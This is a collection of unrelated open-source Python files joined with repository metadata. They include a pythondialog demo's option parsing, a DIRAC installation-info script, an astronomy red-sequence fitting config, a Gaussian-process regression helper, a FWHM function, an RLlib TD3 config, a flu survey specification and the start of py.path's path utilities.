opts, args = getopt.getopt(sys.argv[1:], "ftE",
["test-suite",
"fast",
"debug",
"debug-file=",
"debug-expand-file-opt",
"help",
"version"])
except getopt.GetoptError:
print(usage, file=sys.stderr)
return ("exit", 1)
# Let's start with the options that don't require any non-option argument
# to be present
for option, value in opts:
if option == "--help":
print(usage)
return ("exit", 0)
elif option == "--version":
print("%s %s\n%s" % (progname, progversion, version_blurb))
return ("exit", 0)
# Now, require a correct invocation.
if len(args) != 0:
print(usage, file=sys.stderr)
return ("exit", 1)
# Default values for parameters
params = { "fast_mode": False,
"testsuite_mode": False,
"debug": False,
"debug_filename": default_debug_filename,
"debug_expand_file_opt": False }
# Get the home directory, if any, and store it in params (often useful).
root_dir = os.sep # This is OK for Unix-like systems
params["home_dir"] = os.getenv("HOME", root_dir)
# General option processing
for option, value in opts:
if option in ("-t", "--test-suite"):
params["testsuite_mode"] = True
# --test-suite implies --fast
params["fast_mode"] = True
elif option in ("-f", "--fast"):
params["fast_mode"] = True
elif option == "--debug":
params["debug"] = True
elif option == "--debug-file":
params["debug_filename"] = value
elif option in ("-E", "--debug-expand-file-opt"):
params["debug_expand_file_opt"] = True
else:
# The options (such as --help) that cause immediate exit
# were already checked, and caused the function to return.
# Therefore, if we are here, it can't be due to any of these
# options.
assert False, "Unexpected option received from the " \
"getopt module: '%s'" % option
return ("continue", None)
def main():
"""This demo shows the main features of pythondialog."""
locale.setlocale(locale.LC_ALL, '')
what_to_do, code = process_command_line()
if what_to_do == "exit":
sys.exit(code)
try:
app = MyApp()
app.run()
except dialog.error as exc_instance:
# The error that causes a PythonDialogErrorBeforeExecInChildProcess to
# be raised happens in the child process used to run the dialog-like
# program, and the corresponding traceback is printed right away from
# that child process when the error is encountered. Therefore, don't
# print a second, not very useful traceback for this kind of exception.
if not isinstance(exc_instance,
dialog.PythonDialogErrorBeforeExecInChildProcess):
print(traceback.format_exc(), file=sys.stderr)
print("Error (see above for a traceback):\n\n{0}".format(
exc_instance), file=sys.stderr)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__": main()
|
Morphux/installer
|
pythondialog/examples/demo.py
|
Python
|
apache-2.0
| 71,973
|
[
"Galaxy"
] |
689ec84760b8ddbe3384cf6e82bc2515266426fa4b652f47eb3c6775eb2a91a2
|
#!/usr/bin/env python
########################################################################
# File : dirac-info
# Author : Andrei Tsaregorodtsev
########################################################################
"""
Report info about local DIRAC installation
Example:
$ dirac-info
Option Value
============================
Setup Dirac-Production
ConfigurationServer dips://ccdiracli08.in2p3.fr:9135/Configuration/Server
Installation path /opt/dirac/versions/v7r2-pre33_1613239204
Installation type client
Platform Linux_x86_64_glibc-2.17
VirtualOrganization dteam
User DN /DC=org/DC=ugrid/O=people/O=BITP/CN=Andrii Lytovchenko
Proxy validity, secs 0
Use Server Certificate Yes
Skip CA Checks No
DIRAC version v7r2-pre33
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.DIRACScript import DIRACScript
@DIRACScript()
def main():
import os
import DIRAC
from DIRAC import gConfig
from DIRAC.Core.Base import Script
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC.Core.Utilities.PrettyPrint import printTable
def version(arg):
Script.disableCS()
print(DIRAC.version)
DIRAC.exit(0)
def platform(arg):
Script.disableCS()
print(DIRAC.getPlatform())
DIRAC.exit(0)
Script.registerSwitch("v", "version", "print version of current DIRAC installation", version)
Script.registerSwitch("p", "platform", "print platform of current DIRAC installation", platform)
Script.parseCommandLine(ignoreErrors=True)
records = []
records.append(('Setup', gConfig.getValue('/DIRAC/Setup', 'Unknown')))
records.append(('ConfigurationServer', gConfig.getValue('/DIRAC/Configuration/Servers', [])))
records.append(('Installation path', DIRAC.rootPath))
if os.path.exists(os.path.join(DIRAC.rootPath, DIRAC.getPlatform(), 'bin', 'mysql')):
records.append(('Installation type', 'server'))
else:
records.append(('Installation type', 'client'))
records.append(('Platform', DIRAC.getPlatform()))
ret = getProxyInfo(disableVOMS=True)
if ret['OK']:
if 'group' in ret['Value']:
vo = getVOForGroup(ret['Value']['group'])
else:
vo = getVOForGroup('')
if not vo:
vo = "None"
records.append(('VirtualOrganization', vo))
if 'identity' in ret['Value']:
records.append(('User DN', ret['Value']['identity']))
if 'secondsLeft' in ret['Value']:
records.append(('Proxy validity, secs', {'Value': str(ret['Value']['secondsLeft']), 'Just': 'L'}))
if gConfig.getValue('/DIRAC/Security/UseServerCertificate', True):
records.append(('Use Server Certificate', 'Yes'))
else:
records.append(('Use Server Certificate', 'No'))
if gConfig.getValue('/DIRAC/Security/SkipCAChecks', False):
records.append(('Skip CA Checks', 'Yes'))
else:
records.append(('Skip CA Checks', 'No'))
records.append(('DIRAC version', DIRAC.version))
fields = ['Option', 'Value']
print()
printTable(fields, records, numbering=False)
print()
if __name__ == "__main__":
main()
|
yujikato/DIRAC
|
src/DIRAC/Core/scripts/dirac_info.py
|
Python
|
gpl-3.0
| 3,315
|
[
"DIRAC"
] |
6a3cba6640124b88f68d67c6ee56692a085c9e58d5c1950151506b8d408e6188
|
import decimal
# ------------------------------- READ THIS -----------------------------------
#
# This file contains the information the code uses to fit the red sequence
# in different band combinations. To add a new band, create a new dictionary
# that holds all the same keys as the ones that already exist. Then add it to
# the `config_matches` dictionary. The key is the string with the name of the
# bands that are used, and the value is the configuration dictionary containing
# all the parameters the code needs.
#
# This file also stores AB to Vega conversions, so if your filters aren't
# already in the ab_to_vega dictionary at the bottom, add them.
#
# ---------------------------- Model parameters --------------------------------
#
# There are things we can change about the SPS models that are used to model
# the red sequence. Right now we can only adjust the formation redshift of this
# model galaxy.
zf = 3.0
# --------------------------- Param documentation -----------------------------
#
# This section describes the parameters the code uses to fit the red sequence.
#
# color: Color being fitted. This needs to be of the format
# "first_band-second_band" with no spaces. The name of the bands
# need to match the names of the filters in the ezgal/data/filters
# directory, otherwise the code won't be able to fine the filters.
# Read http://www.baryons.org/ezgal/filters.php to see all the filters
# ezgal has. You can also add your own filters if need be. Read
# http://www.baryons.org/ezgal/manual/file_formats.html#filter-file-format
# for more info.
# blue_band: Bluer of the two bands used above.
# red_band: Redder of the two bands used above.
#
# z_min: minimum possible redshift to be fit. This needs to be a decimal
# object, since the code uses that format under the hood to avoid
# floating point errors. Enter the redshift into the function as a
# string, to avoid floating point errors when it's being created.
# See the existing examples.
# z_max: maximum possible redshift to be fit. Same format as z_min.
# Note: Choose these two to span a region where color is monotonic as a
# function of redshift.
# correction: Without any correction, the code doesn't necessarily produce
# absolutely correct redshifts. There can be systematic biases.
# To fix this, we can create a polynomial that takes uncorrected
# redshifts and turns them into the correct redshifts. This
# parameter is that polynomial. It assumes that the fit comes
# from `numpy.polynomial.polynomial.polyfit()` It is the
# coefficients of the polynomial, starting with the lowest power
# of z. To start, enter `[0, 1]` for this parameter. This means
# that the output z will be 0 + 1 * z, or just z. If you have a
# large sample of galaxy clusters with known redshifts, plot rsz
# redshifts against well-measured redshifts, and find the
# function that best fits, using
# `numpy.polynomial.polynomial.polyfit()`. This is what goes here.
# A linear fit is usually acceptable, and is what was used for
# both r-z and ch1-ch2. Note that those two both have fits close
# to `[0, 1]`, indicating there isn't much correction going on.
# slope_fit: This is the fit (same format as `correction`) that describes the
# slope of the red sequence as a function of redshift. As an initial
# guess, `[0, 0]` will normally be fine. To do this
# properly, you need to figure out what the slope of the red
# sequence is as a function of redshift, then plug that info in
# here.
#
# plot_lims: In the plots we create, we need to know the limits. This parameter
# is a list of 4 items: The minimum red magnitude, the maximum
# red magnitude, the minimum color, and the maximum color. These
# are all set in AB mags. The best way to choose these is to set
# them to span a large range, see where the points are, and hone
# in from there.
#
# ------------ Redshift Fitting Parameters -----------
#
# These parameters are very important, as they describe how the red sequence
# is determined. To do that properly, we need some background on how the code
# works. First, it counts up the number of galaxies near each RS model, and
# picks the model with the most nearby galaxies as an initial guess.
# It then selects those nearby galaxies as potential RS members, and performs
# chi-squared fitting on those to pick the model that best fits them. This is
# done twice, as an iterative process, to ensure that things converge.
# After that is done, we select the final red sequence members as those near
# the model selected as the redshift for the cluster.
#
# initial_mag: Magnitude cuts used in the initial guess fitting process. This
# is a list of the number of magnitudes brighter and fainter than
# the characteristic magnitude. Galaxies will pass this cut if
# they have a magnitude m such that:
# model_m* - initial_mag[0] < m < model_m* + initial_mag[1]
# Galaxies that pass this cut will be counted. You definitely want
# to choose a large bright cut, since the bright galaxies are the
# most important to determining the red sequence. The code
# performs an error cut, so the faint end cut isn't as important,
# but choosing a lower value (less faint) can often increase the
# "signal-to-noise", since faint galaxies don't matter as much.
# initial_color: How much bluer, then redder, than the RS model that galaxies
# can be to be counted during the initial fitting process.
# Galaxies will pass this cut if they have a color c such that:
# model_c - initial_color[0] < c < model_c + initial_color[1]
# Note that both entries in the list need to be positive due to
# how they are defined. Small numbers (0.1, 0.2) are best,
# since they provide the tightest restriction.
# bluer_color_cut: During the main fitting process, the code does color cuts
# on each side of the potential red sequence models. These
# are done from the characteristic color of the RS models.
# This parameter specifies the blue side of those cuts. This
# needs to be a list, where the cuts are for each successive
# iteration. Start with a wide value so that the true RS will
# be included from the very beginning, even if the initial
# guess isn't very good. Don't make it too big, though, since
# including lots of blue galaxies (that often have smaller
# error bars) can drag the fit away from the true RS. The
# final value should be roughly the size of the real RS, or
# maybe slightly smaller to increase "signal to noise". To
# tune these parameters, enable the `fitting_procedure`
# plot in the parameter file for your run, and see whether the
# color cuts are working properly.
# redder_color_cut: This functions the same as `bluer_color_cut`, just on the
# red side of the RS. The advice there applies here too.
# That said, the red cut can often be more forgiving than the
# blue cut, since there are fewer foreground objects on the
# red side to drag things away from the true RS.
# brighter_mag_cut: Same as the previous two parameters, except this is a plain
# magnitude cut (based on distance from the characteristic
# magnitude of the RS model) This needs to be large
# enough to include all the galaxies in the RS.
# dimmer_mag_cut: Same as brighter_mag_cut, just on the dim side. Often a small
# value for this is good, since throwing away the faint
# galaxies improves your signal to noise. The RS is most
# visible on the bright end, so going too faint here will make
# it harder for the code to distinguish the real red sequence.
# note on these last 4: For a galaxy to be selected as a red sequence member,
# it must have a mag m such that
# model_m* - brighter_mag_cut < m < model_m* + dimmer_mag_cut
# then for each successive color iterations, the color c must be
# model_c - bluer_color_cut[i] < c < model_c + redder_color_cut[i]
# Only galaxies that pass both of these cuts will be called red sequence
# galaxies.
#
#
# After the redshift is fitted, we select the final RS members. This is a
# different value than the final value in the color cuts because those
# might be tuned to pick the densest part of the RS, rather than the
# whole thing. These parameters should enclose the whole RS.
# final_rs_mag: A two item list that contains the brighter, then dimmer
# magnitude cut. They should follow the same rules as they
# did above.
# final_rs_color: A two item list that contains the bluer, then redder
# color cuts.
#
# Note that the code does error checking on the config parameters here, so if
# you've done something wrong, it will let you know what went wrong.
#
# ------------ MOST IMPORTANT THING OF ALL -----------------
#
# IF YOU'RE HAVING TROUBLE SETTING UP A NEW BAND, PLEASE DO NOT HESITATE TO
# EMAIL ME AT gillenbrown@gmail.com. I know this setup isn't the most elegant,
# and my documentation doesn't explain things as well as it can.
#
# Also, once you properly set up a band combination, consider submitting a pull
# request on GitHub so others can benefit from your work.
#
# -----------------------------------------------------------------------------
# IRAC ch1 - ch2
ch1_m_ch2 = dict()
ch1_m_ch2["color"] = "ch1-ch2"
ch1_m_ch2["blue_band"] = "ch1"
ch1_m_ch2["red_band"] = "ch2"
ch1_m_ch2["z_min"] = decimal.Decimal("0.7")
ch1_m_ch2["z_max"] = decimal.Decimal("1.7")
ch1_m_ch2["correction"] = [-0.166250545506, 1.12218430826]
ch1_m_ch2["slope_fit"] = [0, 0]
ch1_m_ch2["plot_lims"] = [18, 22, -1, 0.5]
ch1_m_ch2["initial_mag"] = [2.0, 0.0]
ch1_m_ch2["initial_color"] = [0.1, 0.1]
ch1_m_ch2["bluer_color_cut"] = [0.2, 0.1]
ch1_m_ch2["redder_color_cut"] = [0.2, 0.1]
ch1_m_ch2["brighter_mag_cut"] = 2.5
ch1_m_ch2["dimmer_mag_cut"] = 0
ch1_m_ch2["final_rs_mag"] = [2.0, 0.6]
ch1_m_ch2["final_rs_color"] = [0.15, 0.15]
# SDSS r - z
sloan_r_m_sloan_z = dict()
sloan_r_m_sloan_z["color"] = "sloan_r-sloan_z"
sloan_r_m_sloan_z["blue_band"] = "sloan_r"
sloan_r_m_sloan_z["red_band"] = "sloan_z"
sloan_r_m_sloan_z["z_min"] = decimal.Decimal("0.5")
sloan_r_m_sloan_z["z_max"] = decimal.Decimal("1.5")
sloan_r_m_sloan_z["correction"] = [0.01705775352432836, 1.0834470213733527]
sloan_r_m_sloan_z["slope_fit"] = [-0.00343316, -0.14489063]
sloan_r_m_sloan_z["plot_lims"] = [20, 23.5, 0, 3.5]
sloan_r_m_sloan_z["initial_mag"] = [2.0, 0.6]
sloan_r_m_sloan_z["initial_color"] = [0.2, 0.2]
sloan_r_m_sloan_z["bluer_color_cut"] = [0.25, 0.225]
sloan_r_m_sloan_z["redder_color_cut"] = [0.4, 0.3]
sloan_r_m_sloan_z["brighter_mag_cut"] = 1.4
sloan_r_m_sloan_z["dimmer_mag_cut"] = 0.6
sloan_r_m_sloan_z["final_rs_mag"] = [2.0, 0.6]
sloan_r_m_sloan_z["final_rs_color"] = [0.35, 0.35]
# ----------------- ADD NEW COLOR COMBO DICTS HERE ----------------------------
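# As an illustration of the parameters documented above, a hypothetical SDSS
# g - i configuration might start out like this. Every number below is a
# placeholder to be tuned following the documentation; the dict is deliberately
# NOT registered in `cfg_matches`, so it has no effect until added there.
sloan_g_m_sloan_i = dict()
sloan_g_m_sloan_i["color"] = "sloan_g-sloan_i"
sloan_g_m_sloan_i["blue_band"] = "sloan_g"
sloan_g_m_sloan_i["red_band"] = "sloan_i"
sloan_g_m_sloan_i["z_min"] = decimal.Decimal("0.2")    # placeholder redshift range
sloan_g_m_sloan_i["z_max"] = decimal.Decimal("0.8")    # placeholder redshift range
sloan_g_m_sloan_i["correction"] = [0, 1]               # start with no correction
sloan_g_m_sloan_i["slope_fit"] = [0, 0]                # start with a flat red sequence
sloan_g_m_sloan_i["plot_lims"] = [18, 24, 0, 3]        # placeholder plot limits
sloan_g_m_sloan_i["initial_mag"] = [2.0, 0.6]          # placeholder cuts
sloan_g_m_sloan_i["initial_color"] = [0.2, 0.2]        # placeholder cuts
sloan_g_m_sloan_i["bluer_color_cut"] = [0.3, 0.2]      # wide first pass, then tighter
sloan_g_m_sloan_i["redder_color_cut"] = [0.3, 0.2]     # wide first pass, then tighter
sloan_g_m_sloan_i["brighter_mag_cut"] = 2.0            # placeholder cuts
sloan_g_m_sloan_i["dimmer_mag_cut"] = 0.6              # placeholder cuts
sloan_g_m_sloan_i["final_rs_mag"] = [2.0, 0.6]         # placeholder cuts
sloan_g_m_sloan_i["final_rs_color"] = [0.3, 0.3]       # placeholder cuts
# Once tuned, it would be registered as "sloan_g-sloan_i": sloan_g_m_sloan_i in
# the `cfg_matches` dictionary below.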
cfg_matches = {"ch1-ch2": ch1_m_ch2,
"sloan_r-sloan_z": sloan_r_m_sloan_z}
# -----------------------------------------------------------------------------
# store Vega to AB conversions. This stores factor, such that
# Vega_mag = AB_mag + factor, or AB_mag = Vega_mag - factor
# These were obtained from http://www.baryons.org/ezgal/filters.php
ab_to_vega = {"ch1": -2.787,
"ch2": -3.260,
"sloan_u": -0.904,
"sloan_g": 0.098,
"sloan_r": -0.146,
"sloan_i": -0.357,
"sloan_z": -0.521}
# ------------------ Validating this file ------------------------------------
#
# Don't add anything down here, the code here just checks that you filled
# things up properly.
all_keys = ["color", "blue_band", "red_band", "z_min", "z_max", "correction",
"slope_fit", "plot_lims", "initial_mag", "initial_color",
"bluer_color_cut", "redder_color_cut", "brighter_mag_cut",
"dimmer_mag_cut", "final_rs_mag", "final_rs_color"]
for color, cfg in cfg_matches.items():
# check that all the keys are there
for key in all_keys:
if key not in cfg:
raise ValueError("Please add the {} parameter to the {} \n"
"\tconfiguration dictionary in config.py.\n"
"\n".format(key, color))
# then check that there aren't any keys that shouldn't be there
for key in cfg:
if key not in all_keys:
raise ValueError("The parameter {} that you added to the {}\n"
"\tconfiguration dictionary is not needed.\n"
"Please remove it.\n".format(key, color))
# then validate the other parameters.
# the color should match
if color != cfg["color"]:
raise ValueError("The color you specified in the {} dictionary\n"
"\tdoes not match the name you gave it in the \n"
"\t`cfg_matches` dictionary, which is {}. \n"
"\tPlease fix this.\n".format(cfg["color"], color))
# the bands should match the name of the color
if color != "-".join([cfg["blue_band"], cfg["red_band"]]):
raise ValueError("The name of the bands you specified in the\n"
"\t`red_band` and `blue_band` parameters of the {}\n"
"\tdictionary doesn't match the color you gave: {}.\n"
"\tPlease fix this. The color should have the form:\n"
"\tblue_band-red_band.".format(color, color))
# these bands should have AB-Vega conversions
for band in [cfg["red_band"], cfg["blue_band"]]:
if band not in ab_to_vega:
raise ValueError("Please add {} to the `ab_to_vega` dictionary\n"
"\tin config.py.".format(band))
# the z_max and min need to be in decimal format
for z in ["z_max", "z_min"]:
if type(cfg[z]) != decimal.Decimal:
raise ValueError("The {} paramter in the {} config dictionary\n"
"\tneeds to be of type decimal. See the other\n"
"\timplemented ones for an example."
"\n".format(z, color))
# the correction and slope need to be a list with nonzero entries
for key in ["correction", "slope_fit",
"bluer_color_cut", "redder_color_cut"]:
if type(cfg[key]) != list or len(cfg[key]) < 1:
raise ValueError("The {} parameter in the {} configuration\n"
"\tdictionary needs to be a list with at\n"
"\tleast one entry.".format(key, color))
# the plot_lims needs to be a list of 4 values.
if type(cfg["plot_lims"]) != list or len(cfg["plot_lims"]) != 4:
raise ValueError("The parameter plot_lims in the {} configuration\n"
"\tdictionary needs to be a list with 4 items."
"".format(color))
# the initial mag, initial color, final mag, and final color are all
# lists with two values.
for key in ["initial_mag", "initial_color",
"final_rs_mag", "final_rs_color"]:
if type(cfg[key]) != list or len(cfg[key]) != 2:
raise ValueError("The parameter {} in the {} configuration\n"
"\tdictionary needs to be a list with 2 items,\n"
"\tas described in config.py.".format(key, color))
for key in ["brighter_mag_cut", "dimmer_mag_cut"]:
if type(cfg[key]) not in [float, int]:
raise ValueError("The parameter {} in the configuration dict\n"
"\tneeds to be a single value (ie not\n"
"\ta list, even if it only has one item)."
"".format(key))
# the bluer and redder color cuts need to have the same length
if len(cfg["bluer_color_cut"]) != len(cfg["redder_color_cut"]):
raise ValueError("The length of the `bluer_color_cut` and\n"
"\t`redder_color_cut` lists need to be the same\n"
"\tin the {} dictionary in config.py".format(color))
|
gillenbrown/rsz
|
rsz_code/core_rsz/config.py
|
Python
|
mit
| 16,969
|
[
"Galaxy"
] |
2b11567dc0947e1b5e459c7ab43d32422ffe518503910dcc539fbe14967112c9
|
class RepQ01(d.Question):
question = 'Did you have one or more of the following symptoms since your last visit?'
type = 'options-multiple'
blank = True
options = (
(0, 'Runny nose'),
(1, 'Stuffy nose'),
(2, 'Hacking cough'),
(3, 'Dry cough'),
(4, 'Sneezing'),
(5, 'Sore throat'),
(6, 'Muscle pain'),
(7, 'Headache'),
(8, 'Chest pain'),
(9, 'Feeling exhausted'),
(10, 'Feeling tired'),
(11, 'Loss of appetite'),
(12, 'Nausea'),
(13, 'Vomiting'),
(14, 'Diarrhoea'),
(15, 'Watery, bloodshot eyes'),
(16, 'Chills and feverish feeling'),
(17, 'Coloured sputum'),
)
class RepQ02(d.Question):
    question = 'When did these symptoms start?'
type = 'date'
class RepQ03(d.Question):
question = 'Did you have fever? If yes, what was the highest temperature measured? Please estimate if you had fever, but did not measure.'
type = 'options-single'
options = (
(0, 'No'),
(360, 'Less than 37°C'),
(370, '37° - 37.5°C'),
(375, '37.5° - 38°C'),
(380, '38° - 38.5°C'),
(385, '38.5° - 39°C'),
(390, '39° - 39.5°C'),
(395, '39.5° - 40°C'),
(400, 'More than 40°C'),
)
class RepQ04(d.Question):
question = 'When was your temperature for the first time above 38°C?'
type = 'date'
class RepQ05(d.Question):
question = 'Did these symptoms develop abruptly with sudden high fever or chills?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
(2, "Don't know"),
)
class RepQ06(d.Question):
question = 'Did you consult a medical doctor for these symptoms?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
)
class RepQ07(d.Question):
question = 'Did you take medication for these symptoms?'
type = 'options-single'
options = (
(0, 'Tamiflu, Relenza, or another anti viral drug'),
(1, 'Antibiotics'),
(2, 'Antipyretics'),
(3, 'Anti-inflammatory drugs'),
(4, 'Vitamins'),
(5, 'Other'),
)
class RepQ08(d.Question):
question = 'Did you change your occupations due to these symptoms?'
type = 'options-single'
options = (
(0, 'No'),
        (1, 'Yes, I stayed at home'),
        (2, 'Yes, but went to work/school as usual'),
        (3, 'I stayed at home, but was able to work'),
)
class RepQ09(d.Question):
    question = 'How long did you stay at home?'
type = 'options-single'
options = (
(1, '1 day'),
(2, '2 days'),
(3, '3 days'),
(4, '4 days'),
(5, '5 days'),
(6, '6 days'),
(7, '1 week'),
(14, 'Less than 2 weeks'),
(21, 'Less than 3 weeks'),
(22, 'More than 3 weeks'),
)
class RepQ10(d.Question):
question = 'Do other people from your family/home have/had comparable symptoms?'
type = 'options-single'
options = (
(0, 'No'),
(1, 'Yes'),
)
class RepQ11(d.Question):
question = 'According to our data you did not receive a seasonal flu vaccination?'
type = 'options-single'
options = (
(1, 'Yes'),
(0, 'No, meanwhile I have received a seasonal flu vaccination'),
)
class RepQ12(d.Question):
question = 'According to our data you did not receive a Mexican flu vaccination?'
type = 'options-single'
options = (
(1, 'Yes'),
(0, 'No, meanwhile I have received a Mexican flu vaccination'),
)
class Survey(d.Survey):
id = 'dev-survey-0.0'
rules = (
RepQ01,
d.If(~d.Empty(RepQ01)) (
RepQ02,
RepQ03,
RepQ04,
RepQ05,
RepQ06,
RepQ07,
RepQ08,
d.If(d.In(RepQ08, [1,3])) (
RepQ09
),
RepQ10,
d.If(~d.Equal(d.Profile('RegQ5'), 1)) (
RepQ11
),
d.If(~d.Equal(d.Profile('RegQ6'), 1)) (
RepQ12
),
)
)
|
chispita/epiwork
|
data/surveys/survey-spec.py
|
Python
|
agpl-3.0
| 4,170
|
[
"VisIt"
] |
9053b17a46fe0145109279cefa6fb724d2119db2d9e3417fb94ee12578b8ba04
|
"""
GP Regression Model
"""
import numpy as np
import time
####################################################################################################
def GPRegress(K_s,PrecMatrix,K_ss,y,return_covariance=False):
"""
Given input array of kernel values, precision matrix, etc, get predictive
distribution using Gaussian Process Regression.
(may be room for improvement as I only need to calculate diagonal elements
of covariance matrix for predictive points)
INPUTS:
    K_s - (q x n) covariance function of predictive points relative to training points
PrecMatrix - (n x n) precision matrix of training points
K_ss - (q x q) Covariance matrix of predictive points
y - (n x 1) y values of training points
added an option to return the full covariance matrix, if needed to compare
regression on different inputs (added for spot models)
"""
#ensure all data are in matrix form
# K_s = np.matrix(K_s)
# K_ss = np.matrix(K_ss)
# PrecMatrix = np.matrix(PrecMatrix)
y = np.matrix(np.array(y)).T # (n x 1) column vector
# (q x n) = (q x n) * (n x n) * (n x 1)
f_s = K_s * PrecMatrix * y
# (q x q) = (q x q) - (q x n) * (n x n) * (n x q)
var_s = K_ss - np.matrix(K_s) * PrecMatrix * np.matrix(K_s).T
#return predictive values and stddev for each input vector
if return_covariance: return np.array(f_s).flatten(), np.array(var_s)
else: return np.array(f_s).flatten(), np.array(np.sqrt(np.diag(var_s)))
####################################################################################################
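# A minimal usage sketch (not part of the original module): build a toy 1D
# squared-exponential kernel with numpy, invert the training covariance to get
# the precision matrix, and feed everything to GPRegress. The kernel choice,
# noise level and grids below are illustrative assumptions only.
if __name__ == "__main__":
    def sq_exp_kernel(x1, x2, amp=1.0, length=1.0):
        # squared-exponential covariance between two sets of 1D inputs
        return amp ** 2 * np.exp(-0.5 * (x1[:, None] - x2[None, :]) ** 2 / length ** 2)

    x_train = np.linspace(0, 5, 20)
    y_train = np.sin(x_train) + 0.1 * np.random.randn(x_train.size)
    x_pred = np.linspace(0, 5, 100)

    K = sq_exp_kernel(x_train, x_train) + 0.1 ** 2 * np.eye(x_train.size)  # training covariance + noise
    PrecMatrix = np.matrix(np.linalg.inv(K))   # (n x n) precision matrix of training points
    K_s = sq_exp_kernel(x_pred, x_train)       # (q x n)
    K_ss = sq_exp_kernel(x_pred, x_pred)       # (q x q)

    f_pred, f_err = GPRegress(K_s, PrecMatrix, K_ss, y_train)
    print(f_pred[:5], np.asarray(f_err).flatten()[:5])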
|
nealegibson/GeePea
|
src/GPRegression.py
|
Python
|
gpl-3.0
| 1,566
|
[
"Gaussian"
] |
d29fb6ae5a80ee4649eddc4d37bfb57439e21d2a35f3e3d5d5ffd644a6b4ac82
|
'''
@title fwhm
@author: Rebecca Coles
Updated on Nov 15, 2017
Created on Oct 12, 2017
fwhm
This module holds a series of functions that I use to find the
    full-width-half-maximum of a given curve.
Modules:
fwhm3D
This function accepts a 3D array and finds the FWHM of the image.
FWHM is the gaussian PSF full width half maximum (fit result) in pixels
'''
# Import #######################################################################################
from numpy import amax, median, mean, sqrt, sum
################################################################################################
class fwhm(object):
def __init__(self):
'''
Constructor
'''
def fwhm3D(self, array3D):
'''
Accepts a 3D array and finds the FWHM (in pixels) of the image.
FWHM is the gaussian PSF full width half maximum (fit result) in pixels
'''
maxi = amax(array3D)
floor = median(array3D.flatten())
height = maxi - floor
if height == 0.0: # if object is saturated it could be that median value is 32767 or 65535 --> height=0
floor = mean(array3D.flatten())
height = maxi - floor
fwhm = sqrt(sum((array3D>floor+height/2.).flatten()))
return fwhm
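# A minimal usage sketch (not part of the original module): build a synthetic
# 3D Gaussian spot with numpy and measure its width. The grid size and sigma
# below are arbitrary illustrative values.
if __name__ == "__main__":
    import numpy as np
    z, y, x = np.indices((64, 64, 64))
    sigma = 3.0
    spot = np.exp(-((x - 32) ** 2 + (y - 32) ** 2 + (z - 32) ** 2) / (2.0 * sigma ** 2))
    print("effective width (pixels):", fwhm().fwhm3D(spot))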
|
racoles/general_image_processing_functions
|
fwhm.py
|
Python
|
gpl-3.0
| 1,289
|
[
"Gaussian"
] |
5f00c00dabd90663cf8fdf49b01e14a258801c913e575c42045cca2a600d43e9
|
"""A more stable successor to TD3.
By default, this uses a near-identical configuration to that reported in the
TD3 paper.
"""
from ray.rllib.agents.ddpg.ddpg import DDPGTrainer, \
DEFAULT_CONFIG as DDPG_CONFIG
from ray.rllib.utils import merge_dicts
TD3_DEFAULT_CONFIG = merge_dicts(
DDPG_CONFIG,
{
# largest changes: twin Q functions, delayed policy updates, and target
# smoothing
"twin_q": True,
"policy_delay": 2,
"smooth_target_policy": True,
"target_noise": 0.2,
"target_noise_clip": 0.5,
# other changes & things we want to keep fixed: IID Gaussian
# exploration noise, larger actor learning rate, no l2 regularisation,
# no Huber loss, etc.
"exploration_should_anneal": False,
"exploration_noise_type": "gaussian",
"exploration_gaussian_sigma": 0.1,
"learning_starts": 10000,
"pure_exploration_steps": 10000,
"actor_hiddens": [400, 300],
"critic_hiddens": [400, 300],
"n_step": 1,
"gamma": 0.99,
"actor_lr": 1e-3,
"critic_lr": 1e-3,
"l2_reg": 0.0,
"tau": 5e-3,
"train_batch_size": 100,
"use_huber": False,
"target_network_update_freq": 0,
"num_workers": 0,
"num_gpus_per_worker": 0,
"per_worker_exploration": False,
"worker_side_prioritization": False,
"buffer_size": 1000000,
"prioritized_replay": False,
"clip_rewards": False,
"use_state_preprocessor": False,
},
)
TD3Trainer = DDPGTrainer.with_updates(
name="TD3", default_config=TD3_DEFAULT_CONFIG)
|
stephanie-wang/ray
|
rllib/agents/ddpg/td3.py
|
Python
|
apache-2.0
| 1,659
|
[
"Gaussian"
] |
c3f727bcb91032df880310c086e68af36f51314bae91ebd99fcd001c0fc08cdf
|
"""
"""
import os, sys
import py
class Checkers:
_depend_on_existence = 'exists', 'link', 'dir', 'file'
def __init__(self, path):
self.path = path
def dir(self):
raise NotImplementedError
def file(self):
raise NotImplementedError
def dotfile(self):
return self.path.basename.startswith('.')
def ext(self, arg):
if not arg.startswith('.'):
arg = '.' + arg
return self.path.ext == arg
def exists(self):
raise NotImplementedError
def basename(self, arg):
return self.path.basename == arg
def basestarts(self, arg):
return self.path.basename.startswith(arg)
def relto(self, arg):
return self.path.relto(arg)
def fnmatch(self, arg):
return self.path.fnmatch(arg)
def endswith(self, arg):
return str(self.path).endswith(arg)
def _evaluate(self, kw):
for name, value in kw.items():
invert = False
meth = None
try:
meth = getattr(self, name)
except AttributeError:
if name[:3] == 'not':
invert = True
try:
meth = getattr(self, name[3:])
except AttributeError:
pass
if meth is None:
raise TypeError(
"no %r checker available for %r" % (name, self.path))
try:
if py.code.getrawcode(meth).co_argcount > 1:
if (not meth(value)) ^ invert:
return False
else:
if bool(value) ^ bool(meth()) ^ invert:
return False
except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
# EBUSY feels not entirely correct,
                # but it's kind of necessary since ENOMEDIUM
# is not accessible in python
for name in self._depend_on_existence:
if name in kw:
if kw.get(name):
return False
name = 'not' + name
if name in kw:
if not kw.get(name):
return False
return True
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
Checkers = Checkers
def __div__(self, other):
return self.join(str(other))
__truediv__ = __div__ # py3k
def basename(self):
""" basename part of path. """
return self._getbyspec('basename')[0]
basename = property(basename, None, None, basename.__doc__)
def dirname(self):
""" dirname part of path. """
return self._getbyspec('dirname')[0]
dirname = property(dirname, None, None, dirname.__doc__)
def purebasename(self):
""" pure base name of the path."""
return self._getbyspec('purebasename')[0]
purebasename = property(purebasename, None, None, purebasename.__doc__)
def ext(self):
""" extension of the path (including the '.')."""
return self._getbyspec('ext')[0]
